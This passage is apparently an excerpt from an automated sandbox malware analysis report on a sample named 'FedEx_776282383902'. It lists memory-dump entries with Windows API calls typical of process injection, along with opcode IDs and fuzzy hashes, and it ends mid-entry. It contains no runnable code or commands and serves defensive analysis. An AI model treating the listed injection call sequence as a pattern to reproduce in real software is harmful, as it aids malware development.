                  • Instruction Fuzzy Hash: D3214571D003098FDB20DFAAC481BAEBBF4AF49320F14842ED459A7240CB78A945CFA4
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E0E0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 23fd2247fe42b4430a6efcd9edbce5e82b31453839853430349ba8bcaa6625df
                  • Instruction ID: 5b0c93056e5bb576eb6acd73df1750a88bd53120d8ccf5e205a6c7baa46f3c18
                  • Opcode Fuzzy Hash: 23fd2247fe42b4430a6efcd9edbce5e82b31453839853430349ba8bcaa6625df
                  • Instruction Fuzzy Hash: B9210771D003599FDB10DFAAC841BDEBBF5FF48310F548429E959A7240CB799941CBA4
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 77055634215979c6d1085dc6ada19a585320d40a0494376086ef5b5bc756450b
                  • Instruction ID: 57c80db2404a7d99892b64e4a6c9dba6d389a6fedc3137fb7a5eba5a5c30e5d3
                  • Opcode Fuzzy Hash: 77055634215979c6d1085dc6ada19a585320d40a0494376086ef5b5bc756450b
                  • Instruction Fuzzy Hash: E52105B5D003499FDB10CF9AD884ADEBFF4EB49310F14802AE918A3350D374A941CFA4
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0619E0E0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: d837e57898a6d86c7dc1495f9cd7fd00f1c255ccbf80a3a3d100fb4629fcbea3
                  • Instruction ID: 948c71a4d13ef4b95488a411fec624a54c05db6d543b1f75417a1017ca72f9e9
                  • Opcode Fuzzy Hash: d837e57898a6d86c7dc1495f9cd7fd00f1c255ccbf80a3a3d100fb4629fcbea3
                  • Instruction Fuzzy Hash: FC21F871D003599FDB10DFAAC841BDEBBF5FF48310F548429E959A7240CB799941CBA4
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0619DA1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: 313795fa10ae54a43c5695197190da9e04c04f6c5eac94fb4e750ce2c4b2ec00
                  • Instruction ID: 3465af963d33bfdeb240b25e66bfe202da1255fb191d8149f91531ad50741894
                  • Opcode Fuzzy Hash: 313795fa10ae54a43c5695197190da9e04c04f6c5eac94fb4e750ce2c4b2ec00
                  • Instruction Fuzzy Hash: 17214771D007098FDB10DFAAC485BEEBBF4EF49324F54842AD559A7240CB78A945CFA4
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619DF1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 2caddbd07ba824a96522ecd27139bce3b0afa5d05389aadede007838c98071c1
                  • Instruction ID: a060bab53bd83a1565a62901fc61b794715113bc9b3707de176a733cd505377d
                  • Opcode Fuzzy Hash: 2caddbd07ba824a96522ecd27139bce3b0afa5d05389aadede007838c98071c1
                  • Instruction Fuzzy Hash: 33217775C007499FCF20DFAAD845BDEBBF5AF48324F24881AE964A3240CB35A501CFA0
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 5b3164305dba683d4054829768f8e7fd483916188facd65c2c7f36bcec437612
                  • Instruction ID: 305b471d5220580e6b9b5e308f60391aa56cde572ac4f33f79750f4cae48f1da
                  • Opcode Fuzzy Hash: 5b3164305dba683d4054829768f8e7fd483916188facd65c2c7f36bcec437612
                  • Instruction Fuzzy Hash: 0E21E3B5D002099FDB10CF9AD884ADEBBF4EB48310F14842AE918A3350C778A940CFA4
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CAFF9,00000800,00000000,00000000), ref: 012CB20A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: 4f4dcb06d983476571c6f5dc02ba3e6e5a3875b1482d8a0200c01dbf436da0b3
                  • Instruction ID: 5d9d7549e23385b091c5317a7849318f5a8ad1142e9bcb0ef1426b2e88b9fc5c
                  • Opcode Fuzzy Hash: 4f4dcb06d983476571c6f5dc02ba3e6e5a3875b1482d8a0200c01dbf436da0b3
                  • Instruction Fuzzy Hash: B71147B5C003098FDB20CF9AC845B9EFBF4EB89310F10842EE615A7200C7B5A505CFA5
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012CAFF9,00000800,00000000,00000000), ref: 012CB20A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: b61e901efa1d927d64891861bf7e7441bbe25de7409570099dac04c94affc2cd
                  • Instruction ID: 0534f6736db664a3761db1ff7db8570dc71db93414bf5e807fec32eaff956950
                  • Opcode Fuzzy Hash: b61e901efa1d927d64891861bf7e7441bbe25de7409570099dac04c94affc2cd
                  • Instruction Fuzzy Hash: 0A2114B6D0024A8FDB20CFAAD445BDEFBF5EB88310F10852ED619A7200C779A545CFA5
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0619DF1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4f3abdfc5b5993e35315491a9381e8f6f3efbf98b060f41588d196d175ab9cac
                  • Instruction ID: bba3071b68b4d29a2da2b57e835a6a010447b4b1ee4b5f6187a3bfcc1485f041
                  • Opcode Fuzzy Hash: 4f3abdfc5b5993e35315491a9381e8f6f3efbf98b060f41588d196d175ab9cac
                  • Instruction Fuzzy Hash: 49111472C003499FDB20DFAAD845BDEBBF5AF48324F148419E515A7250CB75A941CBA4
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 10aa54824266973cecc57b2809d0600a6b5c5e477840b15eb8555dd7f95a7566
                  • Instruction ID: 5a8ce3bc1d4d81dac7bd0d2068d68edf6a8e9df01189ea7b0e7093f0730bffa8
                  • Opcode Fuzzy Hash: 10aa54824266973cecc57b2809d0600a6b5c5e477840b15eb8555dd7f95a7566
                  • Instruction Fuzzy Hash: 25114975D007498FDB20DFAAC44579EFFF4AF49320F14841ED459A7240CB755945CBA4
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 01493DC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 267509a7999a50e6906112957ef7a50e1b197f2854c31e5cd078fc25b3b8ce69
                  • Instruction ID: 8e4c0b28d37677a395d53c2daacb3704e9d8196c40696d6b34a09c5a3e327b26
                  • Opcode Fuzzy Hash: 267509a7999a50e6906112957ef7a50e1b197f2854c31e5cd078fc25b3b8ce69
                  • Instruction Fuzzy Hash: 301116B58103498FDB20DFA9C445BDEBBF4FB49320F20851AD958A7340D739A545CFA5
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ResumeThread
                  • String ID:
                  • API String ID: 947044025-0
                  • Opcode ID: 04d0d8d4b813cb8d12ffc058f1fce5cb6d0c30415cf002c6f214331b67e7430f
                  • Instruction ID: 04ba6dd7b89eb5dc6aeca7966d3b81c4fff718a48e1a86546db28c8bbd3eb52f
                  • Opcode Fuzzy Hash: 04d0d8d4b813cb8d12ffc058f1fce5cb6d0c30415cf002c6f214331b67e7430f
                  • Instruction Fuzzy Hash: E2113671D007498FDB20DFAAC8457AEFBF5EF88324F248429D519A7240CB79A945CFA4
                  APIs
                  • PostMessageW.USER32(?,?,?,?), ref: 01491275
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 7e5883500a0b9ccb951c76895bd1235cf170ad4adb3a9018463066d8ec45ffc6
                  • Instruction ID: ab33b6b522a7211e70f7902141fb65749805c5d46c5f9d5f81557fde6c353bdb
                  • Opcode Fuzzy Hash: 7e5883500a0b9ccb951c76895bd1235cf170ad4adb3a9018463066d8ec45ffc6
                  • Instruction Fuzzy Hash: 571125B58003499FDB10DF9AC845BDEBFF8FB49320F14845AE558A3210C375AA44CFA1
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAF7E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 34d52b94a84a99b5b5d2d54b8763dca6af5b89fb1c069fa7d40206ff5f2af538
                  • Instruction ID: f9b2c52b0011a037395f5008b21e428815dffe0c98038b9e432d615a6c9cd7b4
                  • Opcode Fuzzy Hash: 34d52b94a84a99b5b5d2d54b8763dca6af5b89fb1c069fa7d40206ff5f2af538
                  • Instruction Fuzzy Hash: CB110FB5C0034A8FDB20CF9AC444B9EFBF4EB88724F10852AD528A7240D379A545CFA1
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(?), ref: 01493DC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: d831ea65558a1196948ce6f0aa77affc2a51588cb4c483f6e0cb7b3e1396c575
                  • Instruction ID: 77de51e21bca218b3c43cc407d3854007772f2ea368de3acde60b4f1f80427ad
                  • Opcode Fuzzy Hash: d831ea65558a1196948ce6f0aa77affc2a51588cb4c483f6e0cb7b3e1396c575
                  • Instruction Fuzzy Hash: 6A11F2B58003498FDB20DF9AC445BDEBBF4FB49320F10841AD968A7740D739A945CFA5
                  APIs
                  • PostMessageW.USER32(?,?,?,?), ref: 01491275
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 5d67a831ff75fdc6b5bde5dc4f520aaf9b6e699e022154f52afe0bcea7945246
                  • Instruction ID: 403b7e1f4af9db9712b7ae2a2cf779961f85de8a2be637bbbc5da4aa25c2a196
                  • Opcode Fuzzy Hash: 5d67a831ff75fdc6b5bde5dc4f520aaf9b6e699e022154f52afe0bcea7945246
                  • Instruction Fuzzy Hash: EE11D0B58003499FDB20DF9AC885BDEBFF8FB49320F10845AE518A7250C379A944CFA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 78d84cdee5a37a47e47f31baf469b85771eff92d36c3895741ee1d75b6a2e029
                  • Instruction ID: cf720357147c5beb68d6be7eb9df1c7426ef13c22148355285b317004fea20c4
                  • Opcode Fuzzy Hash: 78d84cdee5a37a47e47f31baf469b85771eff92d36c3895741ee1d75b6a2e029
                  • Instruction Fuzzy Hash: AC210671504304DFDF19EF58E9C0B56BB65FB84324F20C169D9090B696C336E456CFA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3644f65f251a7658d01dabde857624d77d23a8c8b899b03189bbec800a75a720
                  • Instruction ID: f4662c04d27cfdc3a1db9a916d0a4f3ac5e15dc6e01958e8dd1841a343b18dec
                  • Opcode Fuzzy Hash: 3644f65f251a7658d01dabde857624d77d23a8c8b899b03189bbec800a75a720
                  • Instruction Fuzzy Hash: 5121F471504340DFDF19EF54E9C0B26BF75FB84318F20C56AE8050A696C336D456CAB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae585c5917cf691b9f645f69d1f80acbb2efa741e8defbfaec31b569aae0e740
                  • Instruction ID: e160e6260526beefe0729783c1e1e372db69b08f1efcc43529cb101cebbeccd7
                  • Opcode Fuzzy Hash: ae585c5917cf691b9f645f69d1f80acbb2efa741e8defbfaec31b569aae0e740
                  • Instruction Fuzzy Hash: 59212271A14208EFDB05DF94D9C0B26BBA1FF84324F20C6ADE9494B283C376D807CA61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ae32efcf4f9bfbd0ace9b5f4a609cde5b47e2f4dc2157d82d47d306631fb716
                  • Instruction ID: dca3bf129fef64f023bb9c0f829c42bc3ee30a300a3ce0378dd8598b721bf765
                  • Opcode Fuzzy Hash: 2ae32efcf4f9bfbd0ace9b5f4a609cde5b47e2f4dc2157d82d47d306631fb716
                  • Instruction Fuzzy Hash: C6212275614308DFDB16DF64D9C4B17BB61EF84314F20C56DD90A0B286C376D807CA62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 12110a3746e937ab448967c9bc35258d9d0f65b73d10241d5502d5440f5fc18f
                  • Instruction ID: 5ce52824af8be8eca91ada0ce7414e93ca9bfe5ac6a3f9f43e225a808c092882
                  • Opcode Fuzzy Hash: 12110a3746e937ab448967c9bc35258d9d0f65b73d10241d5502d5440f5fc18f
                  • Instruction Fuzzy Hash: 86218E755093848FCB03CF24D990716BF71EF46314F28C5EAD9498B6A7C33A980ACB62
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: 673458adb96adb10ddef04599d77e0c27bf3289130b3391200dbe257073bb9ad
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 0111CD76504240DFCF06DF48D5C0B56BF62FB84324F24C2A9D8090A696C33AE45ACFA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction ID: 5a1e58da51ee6da7f6fada5d01aee6973b413b59dcde02b18a18b9175311873b
                  • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                  • Instruction Fuzzy Hash: 13119D76504280DFCF16DF54E5C4B16BF72FB84324F24C6AAD8490B696C336D456CBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217386726.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_127d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                  • Instruction ID: c95f26f9841428b6e9518c34b5167f2f9aae23781d493cb33f57193074a32884
                  • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                  • Instruction Fuzzy Hash: 8111A975504284DFDB06CF54C5C0B16BBA2FB84224F28C6A9D9494B297C33AD40ACB61
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8bdc910e28722ec4fb83aff72cddd27614adcfba87ae56fd5f34201191108f7e
                  • Instruction ID: 7ff22a171eff6e0e39b56a74a457a4b053cfe02d696fdd12be6bab3e0f547929
                  • Opcode Fuzzy Hash: 8bdc910e28722ec4fb83aff72cddd27614adcfba87ae56fd5f34201191108f7e
                  • Instruction Fuzzy Hash: A901FC310047849AEB287A55EC84726BF98DF41229F14C419ED080A2C2C7789844CFB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217295620.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_118d000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a61fa2c094669f83a223156ea955fc78bf27d840e2d526a28f93a0932ec407db
                  • Instruction ID: f7c16f67c58e4643d8f9809186b3bb1ae3bc68fdc4400e07d062a93e4104508b
                  • Opcode Fuzzy Hash: a61fa2c094669f83a223156ea955fc78bf27d840e2d526a28f93a0932ec407db
                  • Instruction Fuzzy Hash: 4BF062714047849EEB249A1ADC84B62FFA8EF41735F18C55AEE084A2C6C379A844CBB1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID: PHq$PHq
                  • API String ID: 0-1274609152
                  • Opcode ID: d6c7eff160e33363393778baace05211d705e6bbb7b2f8ed963eebabb98e883c
                  • Instruction ID: 8d26de88bdfb5935838fbabc4321955bd2994d19ec98553c44d2d75efa055bde
                  • Opcode Fuzzy Hash: d6c7eff160e33363393778baace05211d705e6bbb7b2f8ed963eebabb98e883c
                  • Instruction Fuzzy Hash: 17D1C134A006058FDB14DF69C598EADBBF1BF88311F2580A9E50AAB371DB71AD45CF60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8bb26156c5390ae2ec58cc540f1f22ecb303ab633a694a46778762070bab0a75
                  • Instruction ID: 169070e27f5c2a42680ea570b275eb1e07ab45072d269ca51430dea8ea9ecfac
                  • Opcode Fuzzy Hash: 8bb26156c5390ae2ec58cc540f1f22ecb303ab633a694a46778762070bab0a75
                  • Instruction Fuzzy Hash: BFD1AA307017058BEB29DB7AC510BAF7BE6AF99700F18456ED2469B3A0DF35E802CB51
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c2ce636ab1f990095772e865f994b90003767952a2a4a3469be4c1b19139666d
                  • Instruction ID: 00cf0c4d41efa8b47e5cbafa8f546da7aeb611031f569ba6f985c12879005085
                  • Opcode Fuzzy Hash: c2ce636ab1f990095772e865f994b90003767952a2a4a3469be4c1b19139666d
                  • Instruction Fuzzy Hash: 72E1E774E042198FDB14DFA9D580AAEBBF2FF89304F248169D815AB356D734AD41CFA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18b161168f319fb0c38660af5583b5af91ca86e70fd22ace83cd4e88c34a4a1c
                  • Instruction ID: 7e4e880cdc4f0bbcd8fdb882a2065e81c4a2b3c71fe31b9dfe76f3fdd586b162
                  • Opcode Fuzzy Hash: 18b161168f319fb0c38660af5583b5af91ca86e70fd22ace83cd4e88c34a4a1c
                  • Instruction Fuzzy Hash: A7E1D874E006198FDB54CFA9D580AAEBBF2FF89304F248169D819A7356D734AD41CFA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e58e9344978c8917ee949161fb0bdfcd4029ab51acf725a32de5aee4382d4c32
                  • Instruction ID: a74879fc302a7c1bd2c1032bc63e0a4a4e1b8e2045fc67946025de6b9b886292
                  • Opcode Fuzzy Hash: e58e9344978c8917ee949161fb0bdfcd4029ab51acf725a32de5aee4382d4c32
                  • Instruction Fuzzy Hash: 9BE1E774E002198FDB14DFA9C580AAEBBF2FF89304F248169D855A7356D735AD42CFA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 091c99fe6c4cd9cd3eeba944beca82b35a8c10a1219ab3a3aa62f26d63453d09
                  • Instruction ID: 790dbc48947b6af147a07b02449a96626e03319703da15f40295ae0525d8eb9a
                  • Opcode Fuzzy Hash: 091c99fe6c4cd9cd3eeba944beca82b35a8c10a1219ab3a3aa62f26d63453d09
                  • Instruction Fuzzy Hash: 85E1E574E006198FDB14DFA9D580AAEFBB2FF89304F248169D815AB356D734AD41CFA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 393844e4df56e1aea3744a73a4cef9249d5cc1c9f79ca1319a0a9d0d27b4a1d7
                  • Instruction ID: 397cc769cf66fe39b7ff6eed9f9e4c4f9e60830bdb841c004c3f2452745a766c
                  • Opcode Fuzzy Hash: 393844e4df56e1aea3744a73a4cef9249d5cc1c9f79ca1319a0a9d0d27b4a1d7
                  • Instruction Fuzzy Hash: BEE1E774E042198FDB54CFA9D580AAEBBF2FF89304F248169D815A7356D734AD41CFA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 427ad2de2cac586879426939a56554578383c2a8fe7abc7d2d14f8de8792c6ed
                  • Instruction ID: 582e6fa7ab063e27c849a609025ea86efbfc5c0552dcd4b3221955f44dbfa7cb
                  • Opcode Fuzzy Hash: 427ad2de2cac586879426939a56554578383c2a8fe7abc7d2d14f8de8792c6ed
                  • Instruction Fuzzy Hash: CCD1C635C2075A8BCB11EF64D990699F7B1FF95200F20C7AAE50A37214EB74AAD5CF81
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17fe13a4c65711733c179772b480d940eeeecd99e38d33cbc5149d903f74357d
                  • Instruction ID: a1822cfa08edfec826d6d066cdb3c583dbcd480963622751cb6bfcaaf68e3c75
                  • Opcode Fuzzy Hash: 17fe13a4c65711733c179772b480d940eeeecd99e38d33cbc5149d903f74357d
                  • Instruction Fuzzy Hash: 49A16136E1020A8FCF19DFB4C9445AEBBB3FF85700B15466EEA05AB265DB35D906CB40
                  Memory Dump Source
